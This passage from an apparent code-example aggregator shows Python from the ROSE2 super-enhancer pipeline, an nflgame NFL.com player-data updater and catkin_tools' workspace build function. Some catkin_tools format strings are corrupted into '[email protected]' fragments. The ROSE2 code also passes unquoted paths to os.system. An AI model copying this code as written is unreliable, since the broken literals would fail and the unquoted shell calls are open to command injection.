            print("NO MAPPING OUTPUT DETECTED")
            sys.exit()
    else:
        print("CHECKING FOR MAPPED OUTPUT AT %s" % (mappedRankByFile))
        if utils.checkOutput(mappedRankByFile, 1, 30):
            print('MAKING ENHANCER ASSOCIATED GENE TSS SIGNAL DICTIONARIES')
            signalDict = makeSignalDict(mappedRankByFile)
        else:
            print("NO MAPPING OUTPUT DETECTED")
            sys.exit()

    # use enhancer rank to order

    rankOrder = utils.order([min(rankDict[x]) for x in overallGeneList])

    usedNames = []

    # make a new dict to hold TSS signal by max per geneName
    geneNameSigDict = defaultdict(list)
    print('MAKING GENE TABLE')
    for i in rankOrder:
        refID = overallGeneList[i]
        geneName = startDict[refID]['name']
        if usedNames.count(geneName) > 0 and uniqueGenes == True:
            continue
        else:
            usedNames.append(geneName)

        proxEnhancers = geneDict['overlapping'][
            refID] + geneDict['proximal'][refID]

        superStatus = max(superDict[refID])
        enhancerRanks = join([str(x) for x in rankDict[refID]], ',')

        enhancerSignal = signalDict[refID]
        geneNameSigDict[geneName].append(enhancerSignal)

        newLine = [geneName, refID, join(
            proxEnhancers, ','), enhancerRanks, superStatus, enhancerSignal]
        geneToEnhancerTable.append(newLine)
    #utils.unParseTable(geneToEnhancerTable,'/grail/projects/newRose/geneMapper/foo.txt','\t')
    print('MAKING ENHANCER TO TOP GENE TABLE')

    if noFormatTable:
        enhancerToTopGeneTable = [
            enhancerToGeneTable[0] + ['TOP_GENE', 'TSS_SIGNAL']]
    else:
        enhancerToTopGeneTable = [enhancerToGeneTable[0][0:12] + [
            'TOP_GENE', 'TSS_SIGNAL'] + enhancerToGeneTable[0][-2:]]

    for line in enhancerToGeneTable[1:]:

        geneList = []
        if noFormatTable:
            geneList += line[-3].split(',')
            geneList += line[-2].split(',')

        else:
            geneList += line[10].split(',')
            geneList += line[11].split(',')

        geneList = utils.uniquify([x for x in geneList if len(x) > 0])
        if len(geneList) > 0:
            try:
                sigVector = [max(geneNameSigDict[x]) for x in geneList]
                maxIndex = sigVector.index(max(sigVector))
                maxGene = geneList[maxIndex]
                maxSig = sigVector[maxIndex]
                if maxSig == 0.0:
                    maxGene = 'NONE'
                    maxSig = 'NONE'
            except ValueError:
                if len(geneList) == 1:
                    maxGene = geneList[0]
                    maxSig = 'NONE'    
                else:
                    maxGene = 'NONE'
                    maxSig = 'NONE'    
        else:
            maxGene = 'NONE'
            maxSig = 'NONE'
        if noFormatTable:
            newLine = line + [maxGene, maxSig]
        else:
            newLine = line[0:12] + [maxGene, maxSig] + line[-2:]
        enhancerToTopGeneTable.append(newLine)

    # resort enhancerToGeneTable
    if noFormatTable:
        return enhancerToGeneTable, enhancerToTopGeneTable, geneToEnhancerTable
    else:
        enhancerOrder = utils.order([int(line[-2])
                                    for line in enhancerToGeneTable[1:]])
        sortedTable = [enhancerToGeneTable[0]]
        sortedTopGeneTable = [enhancerToTopGeneTable[0]]
        for i in enhancerOrder:
            sortedTable.append(enhancerToGeneTable[(i + 1)])
            sortedTopGeneTable.append(enhancerToTopGeneTable[(i + 1)])

        return sortedTable, sortedTopGeneTable, geneToEnhancerTable

Example 21

Project: pipeline
Source File: ROSE2_META.py
View license
def main():
    '''
    main run call
    '''
    debug = False

    from optparse import OptionParser
    usage = "usage: %prog [options] -g [GENOME] -i [INPUT_REGION_GFF] -r [RANKBY_BAM_FILE] -o [OUTPUT_FOLDER] [OPTIONAL_FLAGS]"
    parser = OptionParser(usage=usage)
    # required flags
    parser.add_option("-i", "--i", dest="input", nargs=1, default=None,
                      help="Enter a comma separated list of .gff or .bed file of binding sites used to make enhancers")
    parser.add_option("-r", "--rankby", dest="rankby", nargs=1, default=None,
                      help="Enter a comma separated list of bams to rank by")
    parser.add_option("-o", "--out", dest="out", nargs=1, default=None,
                      help="Enter an output folder")
    parser.add_option("-g", "--genome", dest="genome", nargs=1, default=None,
                      help="Enter the genome build (MM9,MM8,HG18,HG19)")

    # optional flags
    parser.add_option("-n", "--name", dest="name", nargs=1, default=None,
                      help="Provide a name for the analysis otherwise ROSE will guess")
    parser.add_option("-c", "--control", dest="control", nargs=1, default=None,
                      help="Enter a comma separated list of control bams. Can either provide a single control bam for all rankby bams, or provide a control bam for each individual bam")
    parser.add_option("-s", "--stitch", dest="stitch", nargs=1, default='',
                      help="Enter a max linking distance for stitching. Default will determine optimal stitching parameter")
    parser.add_option("-t", "--tss", dest="tss", nargs=1, default=0,
                      help="Enter a distance from TSS to exclude. 0 = no TSS exclusion")

    parser.add_option("--mask", dest="mask", nargs=1, default=None,
                      help="Mask a set of regions from analysis.  Provide a .bed or .gff of masking regions")

    # RETRIEVING FLAGS
    (options, args) = parser.parse_args()

    if not options.input or not options.rankby or not options.out or not options.genome:
        print('hi there')
        parser.print_help()
        exit()

    # making the out folder if it doesn't exist
    outFolder = utils.formatFolder(options.out, True)

    # figuring out folder schema
    gffFolder = utils.formatFolder(outFolder + 'gff/', True)
    mappedFolder = utils.formatFolder(outFolder + 'mappedGFF/', True)

    # GETTING INPUT FILE(s)

    inputList = [inputFile for inputFile in  options.input.split(',') if len(inputFile) > 1]

    #converting all input files into GFFs and moving into the GFF folder
    inputGFFList = []
    for inputFile in inputList:
        if inputFile.split('.')[-1] == 'bed':
            # CONVERTING A BED TO GFF
            inputGFFName = inputFile.split('/')[-1][0:-4] #strips the last 4 characters i.e. '.bed'
            inputGFFFile = '%s%s.gff' % (gffFolder, inputGFFName)
            utils.bedToGFF(inputFile, inputGFFFile)
        elif options.input.split('.')[-1] == 'gff':
            # COPY THE INPUT GFF TO THE GFF FOLDER

            os.system('cp %s %s' % (inputFile, gffFolder))
            inputGFFFile = '%s%s' % (gffFolder,inputFile.split('/')[-1])

        else:
            print('WARNING: INPUT FILE DOES NOT END IN .gff or .bed. ASSUMING .gff FILE FORMAT')
            # COPY THE INPUT GFF TO THE GFF FOLDER
            os.system('cp %s %s' % (inputFile, gffFolder))
            inputGFFFile = '%s%s' % (gffFolder,inputFile.split('/')[-1])
        inputGFFList.append(inputGFFFile)
                                    

    # GETTING THE LIST OF BAMFILES TO PROCESS
    #either same number of bams for rankby and control 
    #or only 1 control #or none!
    #bamlist should be all rankby bams followed by control bams

    
    bamFileList = []
    if options.control:
        controlBamList = [bam for bam in options.control.split(',') if len(bam) >0]
        rankbyBamList = [bam for bam in options.rankby.split(',') if len(bam) >0]

        if len(controlBamList) == len(rankbyBamList):
            #case where an equal number of backgrounds are given
            bamFileList = rankbyBamList + controlBamList
        elif len(controlBamList) == 1:
            #case where a universal background is applied
            bamFileList = rankbyBamList + controlBamList*len(rankbyBamList)
        else:
            print('ERROR: EITHER PROVIDE A SINGLE CONTROL BAM FOR ALL SAMPLES, OR ONE CONTROL BAM FOR EACH SAMPLE')
            sys.exit()
    else:
        bamFileList = [bam for bam in options.rankby.split(',') if len(bam) > 0]




    # Stitch parameter
    if options.stitch == '':
        stitchWindow = ''
    else:
        stitchWindow = int(options.stitch)

    # tss options
    tssWindow = int(options.tss)
    if tssWindow != 0:
        removeTSS = True
    else:
        removeTSS = False


    # GETTING THE GENOME
    genome = string.upper(options.genome)
    print('USING %s AS THE GENOME' % (genome))

    # GETTING THE CORRECT ANNOT FILE

    genomeDict = {
        'HG18': '%s/annotation/hg18_refseq.ucsc' % (codeFolder),
        'MM9': '%s/annotation/mm9_refseq.ucsc' % (codeFolder),
        'HG19': '%s/annotation/hg19_refseq.ucsc' % (codeFolder),
        'MM8': '%s/annotation/mm8_refseq.ucsc' % (codeFolder),
        'MM10': '%s/annotation/mm10_refseq.ucsc' % (codeFolder),
        'RN4': '%s/annotation/rn4_refseq.ucsc' % (codeFolder),
    }

    try:
        annotFile = genomeDict[genome.upper()]
    except KeyError:
        print('ERROR: UNSUPPORTED GENOMES TYPE %s' % (genome))
        sys.exit()


    #FINDING THE ANALYSIS NAME
    if options.name:
        inputName = options.name
    else:
        inputName = inputGFFList[0].split('/')[-1].split('.')[0]
    print('USING %s AS THE ANALYSIS NAME' % (inputName))


    print('FORMATTING INPUT REGIONS')
    # MAKING THE RAW INPUT FILE FROM THE INPUT GFFs
    #use a simpler unique region naming system 
    if len(inputGFFList) == 1:
        inputGFF = utils.parseTable(inputGFFList[0],'\t')
    else:
        inputLoci = []
        for gffFile in inputGFFList:
            print('\tprocessing %s' % (gffFile))
            gff = utils.parseTable(gffFile,'\t')
            gffCollection = utils.gffToLocusCollection(gff,50)
            inputLoci += gffCollection.getLoci()


        inputCollection = utils.LocusCollection(inputLoci,50)
        inputCollection = inputCollection.stitchCollection() # stitches to produce unique regions

        inputGFF = utils.locusCollectionToGFF(inputCollection)

    formattedGFF = []
    #now number things appropriately
    for i,line in enumerate(inputGFF):
        
        #use the coordinates to make a new id inputname_chr_sense_start_stop
        chrom = line[0]
        coords = [int(line[3]) ,int(line[4])]
        sense = line[6]

        lineID = '%s_%s' % (inputName,str(i+1)) #1 indexing
        
        newLine = [chrom,lineID,lineID,min(coords),max(coords),'',sense,'',lineID]
        formattedGFF.append(newLine)
        
    #name of the master input gff file
    masterGFFFile = '%s%s_%s_ALL_-0_+0.gff' % (gffFolder,string.upper(genome),inputName)
    utils.unParseTable(formattedGFF,masterGFFFile,'\t')

    print('USING %s AS THE INPUT GFF' % (masterGFFFile))


    # MAKING THE START DICT
    print('MAKING START DICT')
    startDict = utils.makeStartDict(annotFile)

    #GET CHROMS FOUND IN THE BAMS
    print('GETTING CHROMS IN BAMFILES')
    bamChromList = getBamChromList(bamFileList)
    print("USING THE FOLLOWING CHROMS")
    print(bamChromList)

    #LOADING IN THE GFF AND FILTERING BY CHROM
    print('LOADING AND FILTERING THE GFF')
    inputGFF = filterGFF(masterGFFFile,bamChromList)
    # LOADING IN THE BOUND REGION REFERENCE COLLECTION
    print('LOADING IN GFF REGIONS')
    referenceCollection = utils.gffToLocusCollection(inputGFF)

    print('CHECKING REFERENCE COLLECTION:')
    checkRefCollection(referenceCollection)
        

    # MASKING REFERENCE COLLECTION
    # see if there's a mask
    if options.mask:
        maskFile = options.mask
        # if it's a bed file
        if maskFile.split('.')[-1].upper() == 'BED':
            maskGFF = utils.bedToGFF(maskFile)
        elif maskFile.split('.')[-1].upper() == 'GFF':
            maskGFF = utils.parseTable(maskFile, '\t')
        else:
            print("MASK MUST BE A .gff or .bed FILE")
            sys.exit()
        maskCollection = utils.gffToLocusCollection(maskGFF)

        # now mask the reference loci
        referenceLoci = referenceCollection.getLoci()
        filteredLoci = [locus for locus in referenceLoci if len(maskCollection.getOverlap(locus, 'both')) == 0]
        print("FILTERED OUT %s LOCI THAT WERE MASKED IN %s" % (len(referenceLoci) - len(filteredLoci), maskFile))
        referenceCollection = utils.LocusCollection(filteredLoci, 50)

    # NOW STITCH REGIONS
    print('STITCHING REGIONS TOGETHER')
    stitchedCollection, debugOutput, stitchWindow = regionStitching(referenceCollection, inputName, outFolder, stitchWindow, tssWindow, annotFile, removeTSS)

    # NOW MAKE A STITCHED COLLECTION GFF
    print('MAKING GFF FROM STITCHED COLLECTION')
    stitchedGFF = utils.locusCollectionToGFF(stitchedCollection)

    print(stitchWindow)
    print(type(stitchWindow))
    if not removeTSS:
        stitchedGFFFile = '%s%s_%sKB_STITCHED.gff' % (gffFolder, inputName, str(stitchWindow / 1000))
        stitchedGFFName = '%s_%sKB_STITCHED' % (inputName, str(stitchWindow / 1000))
        debugOutFile = '%s%s_%sKB_STITCHED.debug' % (gffFolder, inputName, str(stitchWindow / 1000))
    else:
        stitchedGFFFile = '%s%s_%sKB_STITCHED_TSS_DISTAL.gff' % (gffFolder, inputName, str(stitchWindow / 1000))
        stitchedGFFName = '%s_%sKB_STITCHED_TSS_DISTAL' % (inputName, str(stitchWindow / 1000))
        debugOutFile = '%s%s_%sKB_STITCHED_TSS_DISTAL.debug' % (gffFolder, inputName, str(stitchWindow / 1000))

    # WRITING DEBUG OUTPUT TO DISK

    if debug:
        print('WRITING DEBUG OUTPUT TO DISK AS %s' % (debugOutFile))
        utils.unParseTable(debugOutput, debugOutFile, '\t')

    # WRITE THE GFF TO DISK
    print('WRITING STITCHED GFF TO DISK AS %s' % (stitchedGFFFile))
    utils.unParseTable(stitchedGFF, stitchedGFFFile, '\t')

    # SETTING UP THE OVERALL OUTPUT FILE
    outputFile1 = outFolder + stitchedGFFName + '_ENHANCER_REGION_MAP.txt'
    print('OUTPUT WILL BE WRITTEN TO  %s' % (outputFile1))



    # MAPPING TO THE NON STITCHED (ORIGINAL GFF)
    # MAPPING TO THE STITCHED GFF

    # Try to use the bamliquidatior_path.py script on cluster, otherwise, failover to local (in path), otherwise fail.



    bamFileListUnique = list(bamFileList)
    bamFileListUnique = utils.uniquify(bamFileListUnique)
    #prevent redundant mapping
    print("MAPPING TO THE FOLLOWING BAMS:")
    print(bamFileListUnique)
    for bamFile in bamFileListUnique:

        bamFileName = bamFile.split('/')[-1]

        # MAPPING TO THE STITCHED GFF
        mappedOut1Folder = '%s%s_%s_MAPPED' % (mappedFolder, stitchedGFFName, bamFileName)
        mappedOut1File = '%s%s_%s_MAPPED/matrix.txt' % (mappedFolder, stitchedGFFName, bamFileName)
        if utils.checkOutput(mappedOut1File, 0.2, 0.2):
            print("FOUND %s MAPPING DATA FOR BAM: %s" % (stitchedGFFFile, mappedOut1File))
        else:
            cmd1 = bamliquidator_path + " --sense . -e 200 --match_bamToGFF -r %s -o %s %s" % (stitchedGFFFile, mappedOut1Folder, bamFile)
            print(cmd1)

            os.system(cmd1)
            if utils.checkOutput(mappedOut1File,0.2,5):
                print("SUCCESSFULLY MAPPED TO %s FROM BAM: %s" % (stitchedGFFFile, bamFileName))
            else:
                print("ERROR: FAILED TO MAP %s FROM BAM: %s" % (stitchedGFFFile, bamFileName))
                sys.exit()

    print('BAM MAPPING COMPLETED NOW MAPPING DATA TO REGIONS')
    # CALCULATE DENSITY BY REGION
    # NEED TO FIX THIS FUNCTION TO ACCOUNT FOR DIFFERENT OUTPUTS OF LIQUIDATOR
    mapCollection(stitchedCollection, referenceCollection, bamFileList, mappedFolder, outputFile1, refName=stitchedGFFName)


    print('FINDING AVERAGE SIGNAL AMONGST BAMS')
    metaOutputFile = collapseRegionMap(outputFile1,inputName + '_MERGED_SIGNAL',controlBams=options.control)

    #now try the merging

    print('CALLING AND PLOTTING SUPER-ENHANCERS')



    rankbyName = inputName + '_MERGED_SIGNAL'
    controlName = 'NONE'
    cmd = 'R --no-save %s %s %s %s < %sROSE2_callSuper.R' % (outFolder, metaOutputFile, inputName, controlName,codeFolder)
    print(cmd)

    os.system(cmd)

    # calling the gene mapper
    time.sleep(20)
    superTableFile = "%s_SuperEnhancers.table.txt" % (inputName)

    #for now don't use ranking bam to call top genes
    cmd = "python %sROSE2_geneMapper.py -g %s -i %s%s &" % (codeFolder,genome, outFolder, superTableFile)
    os.system(cmd)


    stretchTableFile = "%s_StretchEnhancers.table.txt" % (inputName)
 
    cmd = "python %sROSE2_geneMapper.py -g %s -i %s%s &" % (codeFolder,genome, outFolder, stretchTableFile)
    os.system(cmd)


    superStretchTableFile = "%s_SuperStretchEnhancers.table.txt" % (inputName)

    cmd = "python %sROSE2_geneMapper.py -g %s -i %s%s &" % (codeFolder,genome, outFolder, superStretchTableFile)
    os.system(cmd)

Example 22

Project: nflgame
Source File: update_players.py
View license
def run():
    parser = argparse.ArgumentParser(
        description='Efficiently download player meta data from NFL.com. Note '
                    'that each invocation of this program guarantees at least '
                    '32 HTTP requests to NFL.com',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    aa = parser.add_argument
    aa('--json-update-file', type=str, default=None,
       help='When set, the file provided will be updated in place with new '
            'meta data from NFL.com. If this option is not set, then the '
            '"players.json" file that comes with nflgame will be updated '
            'instead.')
    aa('--simultaneous-reqs', type=int, default=3,
       help='The number of simultaneous HTTP requests sent to NFL.com at a '
            'time. Set this lower if you are worried about hitting their '
            'servers.')
    aa('--full-scan', action='store_true',
       help='Forces a full scan of nflgame player data since 2009. Typically, '
            'this is only done when starting with a fresh JSON player '
            'database. But it can be useful to re-scan all of the players if '
            'past errors went ignored and data is missing. The advantage of '
            'using this option over starting fresh is that an existing '
            '(gsis_id <-> profile_id) mapping can be used for the majority of '
            'players, instead of querying NFL.com for the mapping all over '
            'again.')
    aa('--no-block', action='store_true',
       help='When set, this program will exit with an error instead of '
            'displaying a prompt to continue. This is useful when calling '
            'this program from another script. The idea here is not to block '
            'indefinitely if something goes wrong and the program wants to '
            'do a fresh update.')
    aa('--phase', default=None, choices=['PRE', 'REG', 'POST'],
       help='Force the update to use the given phase of the season.')
    aa('--year', default=None, type=int,
       help='Force the update to use nflgame players from a specific year.')
    aa('--week', default=None, type=int,
       help='Force the update to use nflgame players from a specific week.')
    args = parser.parse_args()

    if args.json_update_file is None:
        args.json_update_file = nflgame.player._player_json_file
    teams = [team[0] for team in nflgame.teams if team[0] != 'STL']
    pool = multiprocessing.pool.ThreadPool(args.simultaneous_reqs)

    # Before doing anything laborious, make sure we have write access to
    # the JSON database.
    if not os.access(args.json_update_file, os.W_OK):
        eprint('I do not have write access to "%s".' % args.json_update_file)
        eprint('Without write access, I cannot update the player database.')
        sys.exit(1)

    # Fetch the initial mapping of players.
    metas, reverse = initial_mappings(args)
    if len(metas) == 0:
        if args.no_block:
            eprint('I want to do a full update, but I have been told to\n'
                   'exit instead of asking if you want to continue.')
            sys.exit(1)

        eprint("nflgame doesn't know about any players.")
        eprint("Updating player data will require several thousand HTTP HEAD "
               "requests to NFL.com.")
        eprint("It is strongly recommended to find the 'players.json' file "
               "that comes with nflgame.")
        eprint("Are you sure you want to continue? [y/n] ", end='')
        answer = raw_input()
        if answer[0].lower() != 'y':
            eprint("Quitting...")
            sys.exit(1)

    # Accumulate errors as we go. Dump them at the end.
    errors = []

    # Now fetch a set of players that aren't in our mapping already.
    # Restrict the search to the current week if we have a non-empty mapping.
    if len(metas) == 0 or args.full_scan:
        eprint('Loading players in games since 2009, this may take a while...')
        players = {}

        # Grab players one game a time to avoid obscene memory requirements.
        for _, schedule in nflgame.sched.games.itervalues():
            # If the game is too far in the future, skip it...
            if nflgame.live._game_datetime(schedule) > nflgame.live._now():
                continue
            g = nflgame.game.Game(schedule['eid'])
            for pid, name in players_from_games(metas, [g]):
                players[pid] = name
        eprint('Done.')
    else:
        year, week = nflgame.live.current_year_and_week()
        phase = nflgame.live._cur_season_phase
        if args.phase is not None:
            phase = args.phase
        if args.year is not None:
            year = args.year
        if args.week is not None:
            week = args.week

        eprint('Loading games for %s %d week %d' % (phase, year, week))
        games = nflgame.games(year, week, kind=phase)
        players = dict(players_from_games(metas, games))

    # Find the profile ID for each new player.
    if len(players) > 0:
        eprint('Finding (profile id -> gsis id) mapping for players...')

        def fetch(t):  # t[0] is the gsis_id and t[1] is the gsis name
            return t[0], t[1], profile_url(t[0])
        for i, t in enumerate(pool.imap(fetch, players.items()), 1):
            gid, name, purl = t
            pid = profile_id_from_url(purl)

            progress(i, len(players))
            if purl is None or pid is None:
                errors.append('Could not get profile URL for (%s, %s)'
                              % (gid, name))
                continue

            assert gid not in metas
            metas[gid] = {'gsis_id': gid, 'gsis_name': name,
                          'profile_url': purl, 'profile_id': pid}
            reverse[pid] = gid
        progress_done()

    # Get the soup for each team roster.
    eprint('Downloading team rosters...')
    roster = []

    def fetch(team):
        return team, roster_soup(team)
    for i, (team, soup) in enumerate(pool.imap(fetch, teams), 1):
        progress(i, len(teams))

        if soup is None:
            errors.append('Could not get roster for team %s' % team)
            continue

        tbodys = soup.find(id='result').find_all('tbody')

        for row in tbodys[len(tbodys)-1].find_all('tr'):
            try:
                roster.append(meta_from_soup_row(team, row))
            except Exception:
                errors.append(
                    'Could not get player info from roster row:\n\n%s\n\n'
                    'Exception:\n\n%s\n\n'
                    % (row, traceback.format_exc()))
    progress_done()

    # Find the gsis identifiers for players that are in the roster but haven't
    # recorded a statistic yet. (i.e., Not in nflgame play data.)
    purls = [r['profile_url']
             for r in roster if r['profile_id'] not in reverse]
    if len(purls) > 0:
        eprint('Fetching GSIS identifiers for players not in nflgame...')

        def fetch(purl):
            return purl, gsis_id(purl)
        for i, (purl, gid) in enumerate(pool.imap(fetch, purls), 1):
            progress(i, len(purls))

            if gid is None:
                errors.append('Could not get GSIS id at %s' % purl)
                continue
            reverse[profile_id_from_url(purl)] = gid
        progress_done()

    # Now merge the data from `rosters` into `metas` by using `reverse` to
    # establish the correspondence.
    for data in roster:
        gsisid = reverse.get(data['profile_id'], None)
        if gsisid is None:
            errors.append('Could not find gsis_id for %s' % data)
            continue
        merged = dict(metas.get(gsisid, {}), **data)
        merged['gsis_id'] = gsisid
        metas[gsisid] = merged

    # Finally, try to scrape meta data for players who aren't on a roster
    # but have recorded a statistic in nflgame.
    gids = [(gid, meta['profile_url'])
            for gid, meta in metas.iteritems()
            if 'full_name' not in meta and 'profile_url' in meta]
    if len(gids):
        eprint('Fetching meta data for players not on a roster...')

        def fetch(t):
            gid, purl = t
            resp, content = new_http().request(purl, 'GET')
            if resp['status'] != '200':
                if resp['status'] == '404':
                    return gid, purl, False
                else:
                    return gid, purl, None
            return gid, purl, content
        for i, (gid, purl, html) in enumerate(pool.imap(fetch, gids), 1):
            progress(i, len(gids))
            more_meta = meta_from_profile_html(html)
            if not more_meta:
                # If more_meta is False, then it was a 404. Not our problem.
                if more_meta is None:
                    errors.append('Could not fetch HTML for %s' % purl)
                continue
            metas[gid] = dict(metas[gid], **more_meta)
        progress_done()

    assert len(metas) > 0, "Have no players to add... ???"
    with open(args.json_update_file, 'w+') as fp:
        json.dump(metas, fp, indent=4, sort_keys=True,
                  separators=(',', ': '))

    if len(errors) > 0:
        eprint('\n')
        eprint('There were some errors during the download. Usually this is a')
        eprint('result of an HTTP request timing out, which means the')
        eprint('resulting "players.json" file is probably missing some data.')
        eprint('An appropriate solution is to re-run the script until there')
        eprint('are no more errors (or when the errors are problems on ')
        eprint('NFL.com side.)')
        eprint('-' * 79)
        eprint(('\n' + ('-' * 79) + '\n').join(errors))

Example 23

Project: catkin_tools
Source File: build.py
View license
def build_isolated_workspace(
    context,
    packages=None,
    start_with=None,
    no_deps=False,
    unbuilt=False,
    n_jobs=None,
    force_cmake=False,
    pre_clean=False,
    force_color=False,
    quiet=False,
    interleave_output=False,
    no_status=False,
    limit_status_rate=10.0,
    lock_install=False,
    no_notify=False,
    continue_on_failure=False,
    summarize_build=None,
):
    """Builds a catkin workspace in isolation

    This function will find all of the packages in the source space, start some
    executors, feed them packages to build based on dependencies and topological
    ordering, and then monitor the output of the executors, handling loggings of
    the builds, starting builds, failing builds, and finishing builds of
    packages, and handling the shutdown of the executors when appropriate.

    :param context: context in which to build the catkin workspace
    :type context: :py:class:`catkin_tools.verbs.catkin_build.context.Context`
    :param packages: list of packages to build, by default their dependencies will also be built
    :type packages: list
    :param start_with: package to start with, skipping all packages which proceed it in the topological order
    :type start_with: str
    :param no_deps: If True, the dependencies of packages will not be built first
    :type no_deps: bool
    :param n_jobs: number of parallel package build n_jobs
    :type n_jobs: int
    :param force_cmake: forces invocation of CMake if True, default is False
    :type force_cmake: bool
    :param force_color: forces colored output even if terminal does not support it
    :type force_color: bool
    :param quiet: suppresses the output of commands unless there is an error
    :type quiet: bool
    :param interleave_output: prints the output of commands as they are received
    :type interleave_output: bool
    :param no_status: disables status bar
    :type no_status: bool
    :param limit_status_rate: rate to which status updates are limited; the default 0, places no limit.
    :type limit_status_rate: float
    :param lock_install: causes executors to synchronize on access of install commands
    :type lock_install: bool
    :param no_notify: suppresses system notifications
    :type no_notify: bool
    :param continue_on_failure: do not stop building other jobs on error
    :type continue_on_failure: bool
    :param summarize_build: if True summarizes the build at the end, if None and continue_on_failure is True and the
        the build fails, then the build will be summarized, but if False it never will be summarized.
    :type summarize_build: bool

    :raises: SystemExit if buildspace is a file or no packages were found in the source space
        or if the provided options are invalid
    """
    pre_start_time = time.time()

    # Assert that the limit_status_rate is valid
    if limit_status_rate < 0:
        sys.exit("[build] @[email protected]{rf}Error:@| The value of --status-rate must be greater than or equal to zero.")

    # Declare a buildspace marker describing the build config for error checking
    buildspace_marker_data = {
        'workspace': context.workspace,
        'profile': context.profile,
        'install': context.install,
        'install_space': context.install_space_abs,
        'devel_space': context.devel_space_abs,
        'source_space': context.source_space_abs}

    # Check build config
    if os.path.exists(os.path.join(context.build_space_abs, BUILDSPACE_MARKER_FILE)):
        with open(os.path.join(context.build_space_abs, BUILDSPACE_MARKER_FILE)) as buildspace_marker_file:
            existing_buildspace_marker_data = yaml.load(buildspace_marker_file)
            misconfig_lines = ''
            for (k, v) in existing_buildspace_marker_data.items():
                new_v = buildspace_marker_data.get(k, None)
                if new_v != v:
                    misconfig_lines += (
                        '\n - %s: %s (stored) is not %s (commanded)' %
                        (k, v, new_v))
            if len(misconfig_lines) > 0:
                sys.exit(clr(
                    "\[email protected]{rf}Error:@| Attempting to build a catkin workspace using build space: "
                    "\"%s\" but that build space's most recent configuration "
                    "differs from the commanded one in ways which will cause "
                    "problems. Fix the following options or use @{yf}`catkin "
                    "clean -b`@| to remove the build space: %s" %
                    (context.build_space_abs, misconfig_lines)))

    # Summarize the context
    summary_notes = []
    if force_cmake:
        summary_notes += [clr("@[email protected]{cf}NOTE:@| Forcing CMake to run for each package.")]
    log(context.summary(summary_notes))

    # Make sure there is a build folder and it is not a file
    if os.path.exists(context.build_space_abs):
        if os.path.isfile(context.build_space_abs):
            sys.exit(clr(
                "[build] @{rf}Error:@| Build space '{0}' exists but is a file and not a folder."
                .format(context.build_space_abs)))
    # If it dosen't exist, create it
    else:
        log("[build] Creating build space: '{0}'".format(context.build_space_abs))
        os.makedirs(context.build_space_abs)

    # Write the current build config for config error checking
    with open(os.path.join(context.build_space_abs, BUILDSPACE_MARKER_FILE), 'w') as buildspace_marker_file:
        buildspace_marker_file.write(yaml.dump(buildspace_marker_data, default_flow_style=False))

    # Get all the packages in the context source space
    # Suppress warnings since this is a utility function
    workspace_packages = find_packages(context.source_space_abs, exclude_subspaces=True, warnings=[])

    # Get packages which have not been built yet
    built_packages, unbuilt_pkgs = get_built_unbuilt_packages(context, workspace_packages)

    # Handle unbuilt packages
    if unbuilt:
        # Check if there are any unbuilt
        if len(unbuilt_pkgs) > 0:
            # Add the unbuilt packages
            packages.extend(list(unbuilt_pkgs))
        else:
            log("[build] No unbuilt packages to be built.")
            return

    # If no_deps is given, ensure packages to build are provided
    if no_deps and packages is None:
        log(clr("[build] @[email protected]{rf}Error:@| With no_deps, you must specify packages to build."))
        return

    # Find list of packages in the workspace
    packages_to_be_built, packages_to_be_built_deps, all_packages = determine_packages_to_be_built(
        packages, context, workspace_packages)

    if not no_deps:
        # Extend packages to be built to include their deps
        packages_to_be_built.extend(packages_to_be_built_deps)

    # Also re-sort
    try:
        packages_to_be_built = topological_order_packages(dict(packages_to_be_built))
    except AttributeError:
        log(clr("[build] @[email protected]{rf}Error:@| The workspace packages have a circular "
                "dependency, and cannot be built. Please run `catkin list "
                "--deps` to determine the problematic package(s)."))
        return

    # Check the number of packages to be built
    if len(packages_to_be_built) == 0:
        log(clr('[build] No packages to be built.'))

    # Assert start_with package is in the workspace
    verify_start_with_option(
        start_with,
        packages,
        all_packages,
        packages_to_be_built + packages_to_be_built_deps)

    # Populate .catkin file if we're not installing
    # NOTE: This is done to avoid the Catkin CMake code from doing it,
    # which isn't parallel-safe. Catkin CMake only modifies this file if
    # it's package source path isn't found.
    if not context.install:
        dot_catkin_file_path = os.path.join(context.devel_space_abs, '.catkin')
        # If the file exists, get the current paths
        if os.path.exists(dot_catkin_file_path):
            dot_catkin_paths = open(dot_catkin_file_path, 'r').read().split(';')
        else:
            dot_catkin_paths = []

        # Update the list with the new packages (in topological order)
        packages_to_be_built_paths = [
            os.path.join(context.source_space_abs, path)
            for path, pkg in packages_to_be_built
        ]

        new_dot_catkin_paths = [
            os.path.join(context.source_space_abs, path)
            for path in [os.path.join(context.source_space_abs, path) for path, pkg in all_packages]
            if path in dot_catkin_paths or path in packages_to_be_built_paths
        ]

        # Write the new file if it's different, otherwise, leave it alone
        if dot_catkin_paths == new_dot_catkin_paths:
            wide_log("[build] Package table is up to date.")
        else:
            wide_log("[build] Updating package table.")
            open(dot_catkin_file_path, 'w').write(';'.join(new_dot_catkin_paths))

    # Remove packages before start_with
    if start_with is not None:
        for path, pkg in list(packages_to_be_built):
            if pkg.name != start_with:
                wide_log(clr("@[email protected]{pf}[email protected]|  @{gf}[email protected]| @{cf}{}@|").format(pkg.name))
                packages_to_be_built.pop(0)
            else:
                break

    # Get the names of all packages to be built
    packages_to_be_built_names = [p.name for _, p in packages_to_be_built]
    packages_to_be_built_deps_names = [p.name for _, p in packages_to_be_built_deps]

    # Generate prebuild and prebuild clean jobs, if necessary
    prebuild_jobs = {}
    setup_util_present = os.path.exists(os.path.join(context.devel_space_abs, '_setup_util.py'))
    catkin_present = 'catkin' in (packages_to_be_built_names + packages_to_be_built_deps_names)
    catkin_built = 'catkin' in built_packages
    prebuild_built = 'catkin_tools_prebuild' in built_packages

    # Handle the prebuild jobs if the develspace is linked
    prebuild_pkg_deps = []
    if context.link_devel:
        prebuild_pkg = None

        # Construct a dictionary to lookup catkin package by name
        pkg_dict = dict([(pkg.name, (pth, pkg)) for pth, pkg in all_packages])

        if setup_util_present:
            # Setup util is already there, determine if it needs to be
            # regenerated
            if catkin_built:
                if catkin_present:
                    prebuild_pkg_path, prebuild_pkg = pkg_dict['catkin']
            elif prebuild_built:
                if catkin_present:
                    # TODO: Clean prebuild package
                    ct_prebuild_pkg_path = get_prebuild_package(
                        context.build_space_abs, context.devel_space_abs, force_cmake)
                    ct_prebuild_pkg = parse_package(ct_prebuild_pkg_path)

                    prebuild_jobs['caktin_tools_prebuild'] = create_catkin_clean_job(
                        context,
